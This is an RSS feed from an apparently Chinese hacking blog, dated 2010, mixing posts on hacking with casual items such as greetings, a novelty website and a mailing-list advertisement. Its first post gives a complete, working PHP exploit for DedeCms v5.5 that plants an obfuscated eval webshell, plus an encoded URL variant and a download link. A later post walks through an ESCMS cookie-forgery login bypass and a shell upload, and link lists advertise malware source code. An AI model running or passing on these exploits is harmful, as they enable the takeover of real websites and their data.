<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>白银时代</title><link>http://www.llsilver.com/</link><description>一个人的精彩</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 91204</generator><language>zh-CN</language><copyright>var sitebot_JsHost = &amp;quot;http://track.sitebot.cc/&amp;quot;;var sitebot_userid = &amp;quot;MTg2Mw==&amp;quot;;var sitebot_websiteid = &amp;quot;NzU1MDgx&amp;quot;; var sitebot_lang = &amp;quot;zh_CN&amp;quot;;管理&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;var gaJsHost = ((&amp;quot;https:&amp;quot; == document.location.protocol) ? &amp;quot;https://ssl.&amp;quot; : &amp;quot;http://www.&amp;quot;);document.write(unescape(&amp;quot;%3Cscript src='&amp;quot; + gaJsHost + &amp;quot;google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E&amp;quot;));try {var pageTracker = _gat._getTracker(&amp;quot;UA-10643850-1&amp;quot;);pageTracker._trackPageview();} catch(err) {}</copyright><pubDate>Wed, 10 Mar 2010 11:23:49 +0800</pubDate><item><title>DedeCms v5.5 0day</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/invasion/dedecms-5-5-0day.html</link><pubDate>Mon, 08 Mar 2010 12:17:51 +0800</pubDate><guid>http://www.llsilver.com/invasion/dedecms-5-5-0day.html</guid><description><![CDATA[<p>官方暂时没出补丁,不过我估计快了<br />执行成功会在在data/cache下生成t.php一句话小马<br />密码t,官方最新GBK和utf-8版本存在此漏洞,<br />此exp的特点是生成t.php得时候不留日志</p><p>&nbsp;<font face="Courier New">&lt;?php<br />print_r('<br />+----------------------------------------+<br />dedecms v5.5 final getwebshell exploit<br />+----------------------------------------+<br />');<br />if ($argc &lt; 3) {<br />print_r('<br />+----------------------------------------+<br />Usage: php '.$argv[0].' host path<br />host:&nbsp; &nbsp;&nbsp; &nbsp;target server (ip/hostname)<br />path:&nbsp; &nbsp;&nbsp; &nbsp;path to dedecms<br />Example:<br />php '.$argv[0].' localhost /dedecms/<br />+----------------------------------------+&nbsp; &nbsp; <br />');<br />exit;<br />}<br />error_reporting(7);<br />ini_set('max_execution_time', 0);<br /><br />$host = $argv[1];<br />$path = $argv[2];<br /><br />$post_a = 'plus/digg_ajax.php?id=1024e1024&amp;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';<br />$post_b = 'needCode=aa/../../../data/mysql_error_trace';<br />$shell = 'data/cache/t.php';<br /><br />get_send($post_a);<br />post_send('plus/comments_frame.php',$post_b);<br />$content = post_send($shell,'t=echo tojen;');<br /><br />if(substr($content,9,3)=='200'){<br />&nbsp; &nbsp; echo &quot;\nShell Address is:&quot;.$host.$path.$shell;<br />}else{<br />&nbsp; &nbsp; echo &quot;\nError.&quot;;<br />}<br />function get_send($url){<br />&nbsp; &nbsp; global $host, $path;<br />&nbsp; &nbsp; $message = &quot;GET &quot;.$path.&quot;$url&nbsp;&nbsp;HTTP/1.1\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Accept: */*\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Referer: http://$host$path\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Accept-Language: zh-cn\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Content-Type: application/x-www-form-urlencoded\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Host: $host\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Connection: Close\r\n\r\n&quot;;<br />&nbsp; &nbsp; $fp = fsockopen($host, 80);<br />&nbsp; &nbsp; if(!$fp){<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;echo &quot;\nConnect to host Error&quot;;<br />&nbsp; &nbsp; }<br />&nbsp; &nbsp; fputs($fp, $message);<br />&nbsp; &nbsp; <br />&nbsp; &nbsp; $back = '';<br /><br />&nbsp; &nbsp; while (!feof($fp))<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$back .= fread($fp, 1024);<br />&nbsp; &nbsp; fclose($fp);<br />&nbsp; &nbsp; return $back;<br />&nbsp; &nbsp; <br />}<br />function post_send($url,$cmd){<br />&nbsp; &nbsp; <br />&nbsp; &nbsp; global $host, $path;<br />&nbsp; &nbsp; $message = &quot;POST &quot;.$path.&quot;$url&nbsp;&nbsp;HTTP/1.1\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Accept: */*\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Referer: http://$host$path\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Accept-Language: zh-cn\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Content-Type: application/x-www-form-urlencoded\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Host: $host\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Content-Length: &quot;.strlen($cmd).&quot;\r\n&quot;;<br />&nbsp; &nbsp; $message .= &quot;Connection: Close\r\n\r\n&quot;;<br />&nbsp; &nbsp; $message .= $cmd;<br />&nbsp; &nbsp; $fp = fsockopen($host, 80);<br />&nbsp; &nbsp; if(!$fp){<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;echo &quot;\nConnect to host Error&quot;;<br />&nbsp; &nbsp; }<br />&nbsp; &nbsp; fputs($fp, $message);<br />&nbsp; &nbsp; <br />&nbsp; &nbsp; $back = '';<br /><br />&nbsp; &nbsp; while (!feof($fp))<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$back .= fread($fp, 1024);<br />&nbsp; &nbsp; fclose($fp);<br />&nbsp; &nbsp; return $back;<br />}<br />?&gt;</font></p><p><font face="Courier New">利用方法<br />http://xxx.com//uploads/plus/digg_frame.php?action=good&amp;id=1024%651024&amp;mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4));?&gt;<br /><a href="http://yyy.com/uploads/plus/comments_frame.php?id=2&amp;needCode=/../../../data/mysql_error_trace">http://yyy.com/uploads/plus/comments_frame.php?id=2&amp;needCode=/../../../data/mysql_error_trace</a><br />在data/cache下生成c.php<br />EXP下载地址：<a target="_blank" href="http://down.qiannao.com/space/file/baiyin/-4e0a-4f20-5206-4eab/-5165-4fb5-8f85-52a9/dedecms-00205.5-0020exp.rar/.page"><span style="color: #800000">千脑下载</span></a></font></p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/invasion/dedecms-5-5-0day.html" target="_blank">继续阅读《DedeCms v5.5 0day》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/invasion.html">入侵辅助</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=dedecms">dedecms</a><a href="http://www.llsilver.com/catalog.asp?tags=0Day">0Day</a><a href="http://www.llsilver.com/catalog.asp?tags=EXP">EXP</a> | <a href="http://www.llsilver.com/invasion/dedecms-5-5-0day.html#comment" target="_blank">添加评论</a>(7)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/invasion/escms-cookies-0day.html" title="ESCMS cookies欺骗0day">ESCMS cookies欺骗0day</a><span>(2010-2-27 14:28:18)</span></li><li><a href="http://www.llsilver.com/invasion/word-tongsha-exp-0day.html" title="Word 通杀溢出生成器（0day？）">Word 通杀溢出生成器（0day？）</a><span>(2010-1-28 10:47:47)</span></li><li><a href="http://www.llsilver.com/invasion/xblog-Fckeditor-exp.html" title="X-Blog漏洞（Fckeditor Exploit）">X-Blog漏洞（Fckeditor Exploit）</a><span>(2010-1-26 17:56:28)</span></li><li><a href="http://www.llsilver.com/invasion/windows-tiquan-tongsha-0day-tool-code.html" title="windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7">windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7</a><span>(2010-1-21 13:8:9)</span></li><li><a href="http://www.llsilver.com/invasion/CityShop-5-5-8-0day.html" title="CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）">CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）</a><span>(2010-1-17 22:33:53)</span></li></ul>]]></description><category>入侵辅助</category><comments>http://www.llsilver.com/invasion/dedecms-5-5-0day.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=472</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=472&amp;key=51cd4414</trackback:ping></item><item><title>bestsquareweb.com网站源码</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/wwwnet/bestsquareweb-code.html</link><pubDate>Sat, 06 Mar 2010 13:13:53 +0800</pubDate><guid>http://www.llsilver.com/wwwnet/bestsquareweb-code.html</guid><description><![CDATA[<p>转载注明版权，此文来源于：<a rel="nofollow" target="_blank" href="http://www.t00ls.net/viewthread.php?tid=6743"><font color="#0000ff">http://www.t00ls.net/viewthread.php?tid=6743</font></a><br /><br />本大王在这里说一下需要注意的东西吧，看完之后自己取舍（<span style="color: #ff0000">如果不需要也请不要拍砖，当做没看见这篇文章好了，尊重一下别人的辛苦</span>）：<br /><br />1、因为是整站FLASH，所以对搜索引擎优化（SEO）极度的不友好，因为搜索引擎的蜘蛛是看不懂FLASH文件里面的内容的。<br /><br />2、全站使用FLASH+XML，没有后台管理，所有图片、文章均需要去源文件里面自行修改、添加。<br /><br />3、只适用于工作室页面的搭建，不适合用来写博客，当然，你要是已经牛X到无以复加的地步，那么请忽略我这句话。<br /><br />演示网站：<a target="_blank" ren="nofollow" href="http://www.bestsquareweb.com/"><font color="#0000ff">http://www.bestsquareweb.com/</font></a><br /><br />演示图片：<br /><img alt="www.llsilver.com" src="http://club.jksing.com/attachments/day_100306/20100306_88bfe2867daec84004c330Mlkhu1UCl8.jpg" /><br /><a href="http://club.jksing.com/attachments/day_100306/20100306_08819d296083c2b38dedTJvnUB2BrvK1.jpg"><img alt="www.llsilver.com" width="512" height="367" src="http://club.jksing.com/attachments/day_100306/20100306_08819d296083c2b38dedTJvnUB2BrvK1.jpg" /></a><br /><a href="http://club.jksing.com/attachments/day_100306/20100306_83b2982c3c8ca4d85286C8LOhV7CSeWf.jpg"><img alt="www.llsilver.com" width="512" height="452" src="http://club.jksing.com/attachments/day_100306/20100306_83b2982c3c8ca4d85286C8LOhV7CSeWf.jpg" /></a><br /><a href="http://club.jksing.com/attachments/day_100306/20100306_f8b161c34ad67b1f26f18UTnJpvOTpXn.jpg"><img alt="www.llsilver.com" width="512" height="279" src="http://club.jksing.com/attachments/day_100306/20100306_f8b161c34ad67b1f26f18UTnJpvOTpXn.jpg" /></a></p><p><strong><span style="color: #ff0000">本来也不是什么了不得的东西，但是有些贱人就是喜欢唧唧歪歪的，没有人求着你用这个程序，我拿刀架你脖子上了？<br />缺点已经写的很清楚了，拿到手又说&ldquo;没有后台管理&rdquo;，&ldquo;垃圾玩意&rdquo;，&ldquo;没法用&rdquo;。<br />FLASH全站带数据库的程序数来数去就那么几套，自己没点眼力劲怪我？</span></strong><br /><strong><span style="color: #ff0000">有需要的在下面留下信箱吧，我发过去。</span></strong></p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/wwwnet/bestsquareweb-code.html" target="_blank">继续阅读《bestsquareweb.com网站源码》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/wwwnet.html">网络转载</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=%E6%BA%90%E7%A0%81">源码</a> | <a href="http://www.llsilver.com/wwwnet/bestsquareweb-code.html#comment" target="_blank">添加评论</a>(9)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/code/xiongmaoshaoxiang-yuanma.html" title="熊猫烧香源码">熊猫烧香源码</a><span>(2009-10-14 9:39:28)</span></li><li><a href="http://www.llsilver.com/passvirus/bianyi-nb5.5.html" title="编译NB5.5源码">编译NB5.5源码</a><span>(2009-10-9 11:44:21)</span></li><li><a href="http://www.llsilver.com/passvirus/fanyunanquan.html" title="让你的免杀更长久 - 反云安全 + 反防毒 + VB源码 + 教学">让你的免杀更长久 - 反云安全 + 反防毒 + VB源码 + 教学</a><span>(2009-8-3 20:56:56)</span></li><li><a href="http://www.llsilver.com/code/65.html" title="VC远控开源：守侯远控——白银时代">VC远控开源：守侯远控——白银时代</a><span>(2009-2-27 14:53:8)</span></li><li><a href="http://www.llsilver.com/code/63.html" title="Anit360deepscan 0.2付源码/反360云查杀付源码">Anit360deepscan 0.2付源码/反360云查杀付源码</a><span>(2009-2-26 10:43:26)</span></li></ul>]]></description><category>网络转载</category><comments>http://www.llsilver.com/wwwnet/bestsquareweb-code.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=471</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=471&amp;key=0820068b</trackback:ping></item><item><title>ESCMS cookies欺骗0day</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/invasion/escms-cookies-0day.html</link><pubDate>Sat, 27 Feb 2010 14:28:18 +0800</pubDate><guid>http://www.llsilver.com/invasion/escms-cookies-0day.html</guid><description><![CDATA[<p>ESCMS cookies欺骗0day</p><p>版本:ESCMS V1.0 SP1 Build 1125<br />后台登陆验证是通过admin/check.asp实现的,看代码</p><p>&lt;%<br />if Request.cookies(CookiesKey)(&quot;ES_admin&quot;)=&quot;&quot; then <br />''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空<br />''CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2<br />Call Err_Show()<br />Response.End()<br />End if<br />......<br />%&gt;</p><p>&nbsp;</p><p>首先我们打开<span style="color: #3366ff">http://www.0daynet.com/admin/es_index.html</span></p><p>&nbsp;</p><p><br />然后在COOKIE结尾加上<br />; ESCMS$_SP2=ES_admin=st0p;</p><p>修改,然后刷新</p><p>进后台了嘎..</p><p>然后呢&hellip;提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码</p><p>&nbsp;</p><p>......<br />formPath=upload.form(&quot;filepath&quot;) ''此处没有过滤<br />if formPath=&quot;&quot; then<br />formPath=&quot;../Upfile&quot;<br />end if<br />Dim formPath1<br />formPath1=&quot;Upfile/&quot;<br />''在目录后加(/)<br />if right(formPath,1)&lt;&gt;&quot;/&quot; then <br />formPath=formPath&amp;&quot;/&quot;<br />end if <br />for each formName in upload.file ''列出所有上传了的文件<br />set file=upload.file(formName) ''生成一个文件对象<br />if file.filesize&lt;100 then<br />response.write &quot;请先选择你要上传的图片!　[ &lt;a href=# onclick=history.go(-1)&gt;请重新上传&lt;/a&gt; ]&quot;<br />response.end<br />end if</p><p>fileExt=lcase(file.FileExt)<br />if CheckFileExt(fileEXT)=false then<br />response.write &quot;文件格式不正确!　[ &lt;a href=# onclick=history.go(-1)&gt;请重新上传&lt;/a&gt; ]&quot;<br />response.end<br />end if</p><p>''randomize<br />ranNum=int(90000*rnd)+10000<br />Dim tempname,temppath<br />tempname=year(now)&amp;month(now)&amp;day(now)&amp;hour(now)&amp;minute(now)&amp;second(now)&amp;ranNum&amp;&quot;.&quot;&amp;fileExt<br />temppath=formPath1&amp;tempname<br />filename=formPath&amp;tempname<br />if file.FileSize&gt;0 then ''如果 FileSize &gt; 0 说明有文件数据<br />result=file.SaveToFile(Server.mappath(filename)) ''保存文件,这里地址就会变成我们截断的SHELL名称<br />......</p><p>&nbsp;</p><p>利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.</p><p>成功了,shell地址为http://www.0daynet.com/admin/diy.asp<br />存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..</p><p>在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆&hellip;</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/invasion/escms-cookies-0day.html" target="_blank">继续阅读《ESCMS cookies欺骗0day》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/invasion.html">入侵辅助</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=0Day">0Day</a><a href="http://www.llsilver.com/catalog.asp?tags=Cookies">Cookies</a><a href="http://www.llsilver.com/catalog.asp?tags=escms">escms</a> | <a href="http://www.llsilver.com/invasion/escms-cookies-0day.html#comment" target="_blank">添加评论</a>(4)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/invasion/dedecms-5-5-0day.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a><span>(2010-3-8 12:17:51)</span></li><li><a href="http://www.llsilver.com/invasion/word-tongsha-exp-0day.html" title="Word 通杀溢出生成器（0day？）">Word 通杀溢出生成器（0day？）</a><span>(2010-1-28 10:47:47)</span></li><li><a href="http://www.llsilver.com/invasion/windows-tiquan-tongsha-0day-tool-code.html" title="windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7">windows最新0day 本地提权 源码+利用工具 通杀所有版本XP 2K 2K3 2K8 VISTA WIN7</a><span>(2010-1-21 13:8:9)</span></li><li><a href="http://www.llsilver.com/invasion/CityShop-5-5-8-0day.html" title="CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）">CityShop v5.5.8 0day注入漏洞（附带：后台获取webshell方法）</a><span>(2010-1-17 22:33:53)</span></li><li><a href="http://www.llsilver.com/invasion/451.html" title="金威世家服装有限公司FLASH整站 0day">金威世家服装有限公司FLASH整站 0day</a><span>(2010-1-7 23:3:45)</span></li></ul>]]></description><category>入侵辅助</category><comments>http://www.llsilver.com/invasion/escms-cookies-0day.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=469</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=469&amp;key=245d219a</trackback:ping></item><item><title>想知道你的前世长啥样不？</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/wwwnet/prelife.html</link><pubDate>Fri, 26 Feb 2010 11:28:52 +0800</pubDate><guid>http://www.llsilver.com/wwwnet/prelife.html</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;嘿嘿，看见这个标题是不是感到很奇怪？知道自己长啥样不？<br />指不准某淫这辈子貌似潘安，上辈子貌若&ldquo;如花&rdquo;。或者说凤姐这辈子长的就那样了，上辈子指不准和貂蝉相媲美呢。</p><p>PS：由此网站引发的不良后果（包括但不限制于：自卑、呕吐、恶心、狂笑等）由浏览此网站者自负。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;请出今天的重点：<a href="http://www.prelife.org/"><span style="color: #800000">http://www.prelife.org/</span></a>点进去看看先~~~~</p><div id="head_r"><span class="title"><b><font color="#222222" size="5">Pre-life Photographic Studio</font></b></span><p class="desc">Do you remember your past live?<br />Pre-life Photographic Studio saves your photographic in a past life</p></div><p>&nbsp;</p><p><img title="" alt="" src="http://www.llsilver.com/upload/prelife.JPG" onload="ResizeImage(this,520)" /></p><p>输完名字之后点那个啥，然后看看自己前世的照片是啥样子。</p><p>&nbsp;</p><p><img alt="llsilver" onload="ResizeImage(this,520)" src="http://www.llsilver.com/upload/prelife-llsilver.JPG" /></p><p>汗一个先~~~</p><p>原来本大王上辈子是只猫&hellip;&hellip;</p><p>囧。</p><p>外文的总归是看不懂的撒，此站提供简体中文，具体网址：<a href="http://cn.prelife.org"><span style="color: #800000">http://cn.prelife.org</span></a>。</p><p>此站仅供娱乐，工作闲暇之余乐一乐、和同事开开玩笑还是个很不错的选择。</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/wwwnet/prelife.html" target="_blank">继续阅读《想知道你的前世长啥样不？》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/wwwnet.html">网络转载</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=blog">blog</a> | <a href="http://www.llsilver.com/wwwnet/prelife.html#comment" target="_blank">添加评论</a>(5)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/wwwnet/466.html" title="How to get accurate information about your potential customer">How to get accurate information about your potential customer</a><span>(2010-2-18 21:45:1)</span></li><li><a href="http://www.llsilver.com/mood/457.html" title="博客、白银时代、百度，瞎写点东西">博客、白银时代、百度，瞎写点东西</a><span>(2010-1-22 22:37:3)</span></li><li><a href="http://www.llsilver.com/mood/446.html" title="屁啊真的是个屁啊">屁啊真的是个屁啊</a><span>(2010-1-1 20:51:48)</span></li><li><a href="http://www.llsilver.com/mood/445.html" title="半个月来全做的无用功">半个月来全做的无用功</a><span>(2009-12-31 16:43:39)</span></li><li><a href="http://www.llsilver.com/system/zblog-ping.html" title="善用Zblog的ping中心，加速博文收录。">善用Zblog的ping中心，加速博文收录。</a><span>(2009-12-22 12:15:3)</span></li></ul>]]></description><category>网络转载</category><comments>http://www.llsilver.com/wwwnet/prelife.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=467</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=467&amp;key=722bd22c</trackback:ping></item><item><title>How to get accurate information about your potential customer</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/wwwnet/466.html</link><pubDate>Thu, 18 Feb 2010 21:45:01 +0800</pubDate><guid>http://www.llsilver.com/wwwnet/466.html</guid><description><![CDATA[<p>&nbsp; In my previous posts, We have discussed about how to promote your products via Internet. In this post, I wana to discuss the most important thing in the Internet marketing. That is how to get the accurate information.<br />&nbsp; I have said that there are many ways to promote your products on the internet. such as email marketing, SEM, etc. But the problem is how to get the accurate information about your custmer. Of course, you can do this via varitey of ways, But the best method is that get the information via some&nbsp; professional　company.<br />&nbsp; The List Company is a mailing list company that has one of the largest databases which contains in excess of 14 million US businesses and 300 million US consumers.The List Company has established itself as a leader in the list industry providing the most effective resources for all of your direct mail and telemarketing needs. Some of the products that we have include, consumer lists, business lists, <a title="telemarketing lists" target="_blank" closure_hashcode_23iniq="1" href="http://www.tlclists.com/"><span style="color: #800000">telemarketing lists</span></a>, <a title="mortgage mailinglist" target="_blank" closure_hashcode_23iniq="2" href="http://www.tlclists.com/MortgageLists.php"><span style="color: #800000">mortgage mailing list</span></a>, and specialty response lists. The mailing list or <a title="telemarketing list" target="_blank" closure_hashcode_23iniq="3" href="http://www.tlclists.com/"><span style="color: #800000">telemarketing list</span></a> that you receive from The List Compa ny is highly targeted data and is guaranteed in writing. <br />&nbsp;With the help of The List Company, you can sell your products well, if you feel bored about how to sell your products. Just try to use the information that The List Company offerd to you.</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/wwwnet/466.html" target="_blank">继续阅读《How to get accurate information about your potential customer》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/wwwnet.html">网络转载</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=blog">blog</a> | <a href="http://www.llsilver.com/wwwnet/466.html#comment" target="_blank">添加评论</a>(2)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/wwwnet/prelife.html" title="想知道你的前世长啥样不？">想知道你的前世长啥样不？</a><span>(2010-2-26 11:28:52)</span></li><li><a href="http://www.llsilver.com/mood/457.html" title="博客、白银时代、百度，瞎写点东西">博客、白银时代、百度，瞎写点东西</a><span>(2010-1-22 22:37:3)</span></li><li><a href="http://www.llsilver.com/mood/446.html" title="屁啊真的是个屁啊">屁啊真的是个屁啊</a><span>(2010-1-1 20:51:48)</span></li><li><a href="http://www.llsilver.com/mood/445.html" title="半个月来全做的无用功">半个月来全做的无用功</a><span>(2009-12-31 16:43:39)</span></li><li><a href="http://www.llsilver.com/system/zblog-ping.html" title="善用Zblog的ping中心，加速博文收录。">善用Zblog的ping中心，加速博文收录。</a><span>(2009-12-22 12:15:3)</span></li></ul>]]></description><category>网络转载</category><comments>http://www.llsilver.com/wwwnet/466.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=466</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=466&amp;key=0240c1c6</trackback:ping></item><item><title>新年快乐</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/mood/465.html</link><pubDate>Sat, 13 Feb 2010 10:03:10 +0800</pubDate><guid>http://www.llsilver.com/mood/465.html</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;过年了，家里很忙，忙得晕头转向。</p><p>白大王在这里祝大家新年快乐，祝工作了的在新的一年里工作步步高升，奖金拿到手软。祝还在念书的在新的一年里学业有成，奖学金多多益善。</p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/mood/465.html" target="_blank">继续阅读《新年快乐》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/mood.html">心路旅程</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=%E9%9A%8F%E7%AC%94">随笔</a> | <a href="http://www.llsilver.com/mood/465.html#comment" target="_blank">添加评论</a>(5)</p><h3>相关文章:</h3><ul><li><a href="http://www.llsilver.com/invasion/iiscan-yaoqingma.html" title="送几个iiscan的邀请码">送几个iiscan的邀请码</a><span>(2010-1-30 13:6:33)</span></li><li><a href="http://www.llsilver.com/mood/457.html" title="博客、白银时代、百度，瞎写点东西">博客、白银时代、百度，瞎写点东西</a><span>(2010-1-22 22:37:3)</span></li><li><a href="http://www.llsilver.com/mood/aile-vpn-laji.html" title="爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN">爱乐VPN，本大王用过的最垃圾、最烂、最差、态度最恶劣的收费VPN</a><span>(2010-1-19 22:42:24)</span></li><li><a href="http://www.llsilver.com/mood/428.html" title="本大王回来了">本大王回来了</a><span>(2009-12-19 23:8:18)</span></li><li><a href="http://www.llsilver.com/mood/423.html" title="想把域名解析到新的二级域名下面。">想把域名解析到新的二级域名下面。</a><span>(2009-11-29 20:20:16)</span></li></ul>]]></description><category>心路旅程</category><comments>http://www.llsilver.com/mood/465.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=465</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=465&amp;key=c5271c96</trackback:ping></item><item><title>罗玉凤——六百年没人超过我！（视频）</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html</link><pubDate>Fri, 05 Feb 2010 17:45:29 +0800</pubDate><guid>http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html</guid><description><![CDATA[<p><span style="color: #0000ff"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;本大王忍着胃部痉挛看完了这段视频。<br />再次提醒各位心理素质不好的网友勿观看此视频，因为此女已经六百年没人超过了！</strong></span></p><p><a href="http://v.youku.com/v_show/id_XMTQ4Nzk2NjI4.html"><span style="color: #800000">http://v.youku.com/v_show/id_XMTQ4Nzk2NjI4.html</span></a></p><p>Copyright © 2008</p><p><a href="http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html" target="_blank">继续阅读《罗玉凤——六百年没人超过我！（视频）》的全文内容...</a></p><p>分类: <a href="http://www.llsilver.com/post/wwwnet.html">网络转载</a> | Tags: <a href="http://www.llsilver.com/catalog.asp?tags=%E8%A7%86%E9%A2%91">视频</a> | <a href="http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html#comment" target="_blank">添加评论</a>(8)</p><p><a href="http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>网络转载</category><comments>http://www.llsilver.com/wwwnet/luoyufeng-600nian-shipin.html#comment</comments><wfw:comment>http://www.llsilver.com/</wfw:comment><wfw:commentRss>http://www.llsilver.com/feed.asp?cmt=464</wfw:commentRss><trackback:ping>http://www.llsilver.com/cmd.asp?act=tb&amp;id=464&amp;key=92e71c73</trackback:ping></item><item><title>360本地提权(Webshell下用)</title><author>874587@gmail.com (白银时代)</author><link>http://www.llsilver.com/invasion/360-tiquan-Shell.html</link><pubDate>Tue, 02 Feb 2010 16:19:34 